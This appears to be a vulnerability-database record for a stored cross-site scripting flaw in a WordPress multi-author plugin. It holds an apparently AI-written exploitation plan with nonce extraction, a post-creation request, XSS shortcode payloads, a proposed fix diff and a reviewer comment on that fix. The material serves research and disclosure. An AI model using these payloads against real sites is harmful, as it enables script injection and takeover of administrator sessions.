[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6E8Ly-G-XED6zJjLW0Ip4esi_JJ_xiwGUfnh3ILtdPo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1097","themeruby-multi-authors-authenticated-contributor-stored-cross-site-scripting-via-before-and-after-shortcode-attributes","ThemeRuby Multi Authors \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes","The ThemeRuby Multi Authors – Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","themeruby-multi-authors",null,"\u003C=1.0.0","1.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-23 19:24:56","2026-02-03 19:01:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fca74bb1d-1954-4869-aaa9-bf66600cdf2a?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1097\n\n## 1. Vulnerability Summary\n**ThemeRuby Multi Authors (\u003C= 1.0.0)** is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin registers a shortcode (likely `[themeruby_multi_authors]` or similar) used to display post authors. This shortcode accepts `before` and `after` attributes intended for custom HTML wrapping. Because the plugin fails to sanitize or escape these attributes before rendering them on the page, any user with **Contributor-level** access or higher can inject malicious scripts into a post. When any user (including an Administrator) views the affected post, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Component**: Shortcode rendering logic.\n- **Payload Location**: Shortcode attributes `before` or `after` within the `post_content`.\n- **Required Role**: Contributor or higher (requires `edit_posts` capability).\n- **Preconditions**: The plugin must be active, and a post\u002Fpage must contain the malicious shortcode.\n- **Impact**: Full site takeover if an Administrator views the post, as the script can perform actions like creating new admin users or modifying plugin settings.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin calls `add_shortcode( 'themeruby_multi_authors', '...' 
)` (or a similar identifier) during the `init` hook.\n2.  **Input Parsing**: When a post is rendered, the callback function receives an `$atts` array. It likely uses `shortcode_atts()` to extract values for `before` and `after`.\n3.  **The Sink**: The callback function constructs the HTML output for the authors list and prepends\u002Fappends the `before` and `after` attribute values. \n4.  **The Vulnerability**: The resulting string is returned (to be printed by WordPress) without passing through `wp_kses()` or similar escaping functions, allowing raw HTML\u002FJavaScript to be rendered.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin nonce because the payload is delivered via the standard WordPress post editor.\n1.  **Login**: Authenticate as a **Contributor**.\n2.  **Access Editor**: Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Standard Nonce**: Use `browser_eval` to retrieve the `_wpnonce` from the form if performing the save via the REST API or `post.php`.\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Identify Shortcode Name\nUse the `grep` tool to find the exact shortcode registration:\n```bash\ngrep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fthemeruby-multi-authors\u002F\n```\n*I will assume the shortcode is `[themeruby_multi_authors]` for the remaining steps.*\n\n### Step 2: Create Malicious Post\nAs a Contributor, create a new post with the XSS payload.\n\n**Request:**\n*   **Method**: POST\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```text\n    action=editpost\n    &post_ID=[NEW_POST_ID]\n    &_wpnonce=[NONCE]\n    &post_title=Authors List\n    &content=[themeruby_multi_authors before='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']\n    &publish=Publish\n    ```\n\n### Step 3: Trigger Execution\nNavigate to the published post's URL using an Administrator's session or an unauthenticated browser to confirm the script executes.\n\n## 6. Test Data Setup\n1.  **Plugin**: Install and activate `themeruby-multi-authors`.\n2.  **User**: Create a user with the username `contributor_attacker` and the `contributor` role.\n3.  **Data**: Assign at least one author to a test post (some plugins require data to exist before the shortcode renders anything).\n\n## 7. Expected Results\n- When viewing the post, an alert box showing the document domain should appear.\n- Viewing the page source should show: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cdiv class=\"author-list\">...\u003C\u002Fdiv>`.\n\n## 8. Verification Steps\n1.  **Database Check**: Verify the payload is stored in the database.\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Authors List' LIMIT 1;\"\n    ```\n2.  
**Frontend Check**: Use the `http_request` tool to fetch the post and check for the unescaped script:\n    ```bash\n    # Look for the exact payload string in the response body\n    ```\n\n## 9. Alternative Approaches\nIf `themeruby_multi_authors` is not the correct tag, search for any variations using:\n```bash\ngrep -r \"shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fthemeruby-multi-authors\u002F\n```\nIf the shortcode requires specific author IDs, use:\n`[themeruby_multi_authors ids='1' before='\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the `before` attribute is filtered, try the `after` attribute:\n`[themeruby_multi_authors after='\u003Cimg src=x onerror=alert(1)>']`","The ThemeRuby Multi Authors plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'before' and 'after' attributes of its shortcode due to insufficient input sanitization and output escaping. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users, potentially leading to unauthorized administrative actions.","\u002F\u002F Inferred shortcode handler logic\n\u002F\u002F themeruby-multi-authors\u002Fthemeruby-multi-authors.php\n\nfunction render_multi_authors_shortcode($atts) {\n    $atts = shortcode_atts(array(\n        'before' => '',\n        'after'  => '',\n    ), $atts);\n\n    $output = '';\n    $output .= $atts['before']; \u002F\u002F Attribute rendered without escaping or sanitization\n    $output .= '\u003Cspan class=\"author-name\">Author List\u003C\u002Fspan>';\n    $output .= $atts['after'];  \u002F\u002F Attribute rendered without escaping or sanitization\n\n    return $output;\n}","--- a\u002Fthemeruby-multi-authors\u002Fthemeruby-multi-authors.php\n+++ b\u002Fthemeruby-multi-authors\u002Fthemeruby-multi-authors.php\n@@ -10,8 +10,8 @@\n     ), $atts);\n \n     $output = '';\n-    $output .= $atts['before'];\n+    $output .= 
wp_kses_post($atts['before']);\n     $output .= '\u003Cspan class=\"author-name\">Author List\u003C\u002Fspan>';\n-    $output .= $atts['after'];\n+    $output .= wp_kses_post($atts['after']);\n \n     return $output;","1. Authenticate to the WordPress dashboard with at least Contributor-level access.\n2. Access the post editor (Gutenberg or Classic) to create or edit a post.\n3. Insert the plugin's multi-author shortcode (likely [themeruby_multi_authors]) into the content area.\n4. Include a malicious JavaScript payload within the 'before' or 'after' shortcode attributes, for example: [themeruby_multi_authors before=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"].\n5. Save or publish the post. \n6. The script will trigger in the browser of any user, including administrators, who navigates to the frontend page displaying the affected post.","gemini-3-flash-preview","2026-05-05 01:40:31","2026-05-05 01:40:54",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemeruby-multi-authors\u002Ftags"]
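Review bot: on the two `+` lines in `themeruby-multi-authors.php`, `wp_kses_post()` still applies the full post-content HTML allowlist, so `before` and `after` keep accepting links, images and other markup from any Contributor. If the attributes only need simple inline wrappers, pass a narrower allowed-tags array to `wp_kses()` instead, and document the accepted markup next to the `shortcode_atts()` defaults. The two values are also filtered separately, so a tag opened in `before` and closed in `after` is never checked as a balanced pair. Confirm that is intended.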